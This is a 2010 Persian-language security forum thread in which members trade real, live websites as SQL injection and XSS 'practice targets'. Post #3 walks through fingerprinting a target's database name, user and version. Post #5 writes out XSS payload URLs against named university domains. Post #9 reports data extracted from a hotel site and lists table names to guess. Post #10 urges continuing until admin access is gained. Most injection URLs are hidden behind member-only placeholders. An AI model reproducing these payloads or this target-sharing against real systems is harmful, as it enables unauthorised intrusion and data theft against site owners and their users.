IT Security Team  
بازگشت   IT Security Team > مقالات ، ابزارها و فیلم های آسیب پذیریهای Web Application > مباحث Sql Injection

ثبت نام سريع
مشخصات شما هنوز در سايت ثبت نشده است . براي ثبت نام سريع از قسمت پايين اقدام كنيد .

نام کاربری: رمز عبور: تکرار رمز عبور: آدرس ایمیل: تکرار آدرس ایمیل:
 
تصویر تائید کننده
لطفا شش حرف یا عددی که در تصویر تائیدکننده مشاهده می کنید را وارد کنید.

  موافقم با قوانین انجمن  

پاسخ
 
ابزارهای موضوع نحوه نمایش
قدیمی 02-28-2010, 08:25 PM   #1
hadi85
عضو فعال
 
hadi85 آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 135
Thanks: 27
Thanked 56 Times in 35 Posts
پیش فرض target برای تمرین Injection

کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
hadi85 آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to hadi85 For This Useful Post:
bicha (08-03-2010), Mo3sLiM (06-17-2010)
قدیمی 03-02-2010, 01:52 AM   #2
Provider
عضو فعال
 
Provider آواتار ها
 
تاریخ عضویت: Feb 2010
نوشته ها: 106
Thanks: 108
Thanked 97 Times in 54 Posts
پیش فرض

اينم چند تا ديگه

کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
دوستان لطفا براي گرفتن جواب مطلوب با Firefox سايتها را بررسي كنند.

ویرایش توسط Provider : 03-06-2010 در ساعت 09:09 AM
Provider آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to Provider For This Useful Post:
am!rkh@n (03-02-2010)
قدیمی 03-03-2010, 04:05 AM   #3
Provider
عضو فعال
 
Provider آواتار ها
 
تاریخ عضویت: Feb 2010
نوشته ها: 106
Thanks: 108
Thanked 97 Times in 54 Posts
پیش فرض

حالا مي خواهيم براي نمونه يكي ازسايتها را مورد بررسي مقدماتي قرار دهيم.
کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
براي شروع به آدرس آسيب پذيري كه در پست قبلي نيز به آن اشاره شده بود مي رويم. يعني
کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
همانطور كه مشاهده مي كنيد با خطاي Unclosed quotation mark مواجه مي شويد. و اين يعني آسيب پذيري روي اين سرور.
خوب حالا مي خواهيم اسم Database* را پيدا كنيم. با دستور زير اين كار را انجام مي دهيم:
کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
اگر بخواهيد از اسم كاربري كه با Database در حال تعامل است نيز آگاه شويم، مي توانيم از تابع user_name() به صورت زير استفاده كنيم.
کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
به همين ترتيب به سادگي مي توانيم HostName سرور Database* را نيز بدست آوريم.
کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
اگر بخواهيم نوع Database را نيز بدست بياوريم، به صورت زير اقدام مي كنيم:
کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند

ویرایش توسط Provider : 03-03-2010 در ساعت 04:19 AM
Provider آنلاین نیست.   پاسخ با نقل قول
قدیمی 03-04-2010, 02:59 AM   #4
firemaker
عضو جديد
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 81
Thanks: 44
Thanked 122 Times in 57 Posts
پیش فرض



با سلام
خیلی عالی بود و خیلی حال کردم. ولی یک سوال داشتم. این سایتها را چه جوری پیدا کردید؟ آیا خودتون وقت گذاشتید و دونه دونه پیدا کردید یا اینکه با ابزار خاصی این کار رو کردید؟
اگه از ابزار خاصی استفاده می کنید میشه به ما هم بدید.
می خوام بگم روزانه باگهای زیادی توی سایتهای مختلف اعلام میشه ولی عملاً پیدا کردن سایتهایی که اون باگها رو داشته باشند خیلی راحت نیست و زمان زیادی می بره.
آیا برای این کار راه حل سریعتری وجود داره؟
با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
قدیمی 03-04-2010, 04:03 AM   #5
fn2008
عضو جديد
 
fn2008 آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 3
Thanks: 0
Thanked 0 Times in 0 Posts
پیش فرض تارگت جدید از xss

لطفا کاری به این سایت ها نداشته باشید


http://www.napnu.ac.ir/LinkClick.aspx?link=<script>alert('hacking%20xss') </script>

http://www.pnu.ac.ir/Portal/Home/../Menu/../Home/Default.aspx?CategoryID=<script>alert('hacking%20x ss')</script>

http://www.qpnubasij.com/News.aspx?id=28&amp;PageSource=khabarerooz<script> alert('hacking%20xss')</script>


http://www.qpnubasij.com/News.aspx?id=28&amp;PageSource=khabarerooz<script> alert('hacking%20xss')</script>

http://www.pnu.ac.ir/Portal/Home/../Menu/../Home/Default.aspx?CategoryID=<script>alert('hacking%20x ss')</script>

tp://www.napnu.ac.ir/LinkClick.aspx?link=<script>alert('hacking%20xss') </script>



حالا می خواهم یک حال مشتی به دوستان هکری بدم


[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

بقیه کارا با خودتان


با تشکر fn2008
fn2008 آنلاین نیست.   پاسخ با نقل قول
قدیمی 03-05-2010, 06:32 AM   #6
0xd41684c654
مديريت بخش
 
0xd41684c654 آواتار ها
 
تاریخ عضویت: Jun 2009
نوشته ها: 318
Thanks: 28
Thanked 144 Times in 95 Posts
پیش فرض

دوستان خواستن یه تستی بزنن رو این سایت.
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
0xd41684c654 آنلاین نیست.   پاسخ با نقل قول
قدیمی 03-06-2010, 09:35 AM   #7
Provider
عضو فعال
 
Provider آواتار ها
 
تاریخ عضویت: Feb 2010
نوشته ها: 106
Thanks: 108
Thanked 97 Times in 54 Posts
پیش فرض

با سلام

در مورد سوال دوست عزيزم firemaker، بايد خدمت ايشان عرض كنم كه از ابزار خاصي استفاده نكرده ام و براي اين قبيل كارها فقط بايد پشتكار و دقت داشت (والبته مقداري هم فرصت شناسي)

در مورد پست fn2008 نيز بايد عرض كنم، دوست عزيزم، آسيب پذيري XSS به نفوذگر اين اجازه را مي دهد تا اسکریپت های سمت کاربر را درون صفحاتی که توسط کاربران دیگر دیده می شوند تزریق کند. و اگر بخواهي دسترسي روي سايت ايجاد كني لازم است سراغ موارد ديگري بروي.
Provider آنلاین نیست.   پاسخ با نقل قول
قدیمی 03-29-2010, 11:14 AM   #8
Provider
عضو فعال
 
Provider آواتار ها
 
تاریخ عضویت: Feb 2010
نوشته ها: 106
Thanks: 108
Thanked 97 Times in 54 Posts
پیش فرض

سایتهای زیر ارایه دهنده خدمات Hosting بوده و البته دارای آسيب پذيري Blind Injection مي باشند.

کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
Provider آنلاین نیست.   پاسخ با نقل قول
قدیمی 04-11-2010, 05:19 PM   #9
firemaker
عضو جديد
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 81
Thanks: 44
Thanked 122 Times in 57 Posts
پیش فرض معرفی یک سایت در مورد اینجکشن و یک نمونه target برای تست اینجکشن

با سلام

می خواستم یه سایت خوب برای یافتن اینجکشن های جدید معرفی کنم که آدرسش [فقط اعضای سایت قادر به دیدن لینکها میباشند ] هستش.
این سایت از نظر ظاهر مثل سایت Milw0rm خدابیامرزه که باگهای به روز رو درج می کنه.

برای نمونه یه باگ رو که مربوط به امروزه می تونید تو این آدرس پیدا کنید:

[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

که روی target زیر برای تست میشه اینجوری عمل کرد:

کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
نتایج به دست آمده:
user : data_user_hotels@localhost
version : 4.1.20


در اینجا می بینید که نسخه اون زیر 5 هستش. بنابراین بحث information_schema روی اون جواب نمیده و مثلاً نمیشه دستور زیر رو روی اون اجرا کرد:

کد:
فقط كاربران سايت قادر به ديدن لينكها ميباشند
پس تنها راهی که می مونه اینه که اسم جدول کاربران اونو حدس بزنید مثلاً:
users
usrs
userlogins
logins
members
, ...
می دونید چیه من حدسم ضعیفه. بی زحمت ادامش با خودتون.
هتل خوش بگذره.

با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to firemaker For This Useful Post:
brwsk007 (06-12-2010), Provider (04-11-2010), rahnama (04-12-2010)
قدیمی 04-12-2010, 03:06 PM   #10
rahnama
عضو جديد
 
rahnama آواتار ها
 
تاریخ عضویت: Oct 2009
نوشته ها: 33
Thanks: 45
Thanked 23 Times in 18 Posts
Thumbs up new target (sql injection)

ba salam khedmate dostan , ye target jadid ke injection on ro site exploit-db gozaresh kardeh khedmatetoon moarrefi mikonam. fekr konam baraye tamrin bad nabashe, choon kheili sadeh hastesh.
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
[فقط اعضای سایت قادر به دیدن لینکها میباشند ] -->num of columns=5
[فقط اعضای سایت قادر به دیدن لینکها میباشند ] --> 2 3 4

edemeye amaliat ro ta be dast avordaneh admin be rahati mitoonid anjam bedid...
khosh bashdi.
rahnama آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to rahnama For This Useful Post:
firemaker (04-12-2010), Provider (04-12-2010)
پاسخ

برچسب ها
injection, sql, target

ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است

انتخاب سریع یک انجمن


اکنون ساعت 05:20 PM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.

Free Persian Language By Persian Forum Ver 3.0
كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد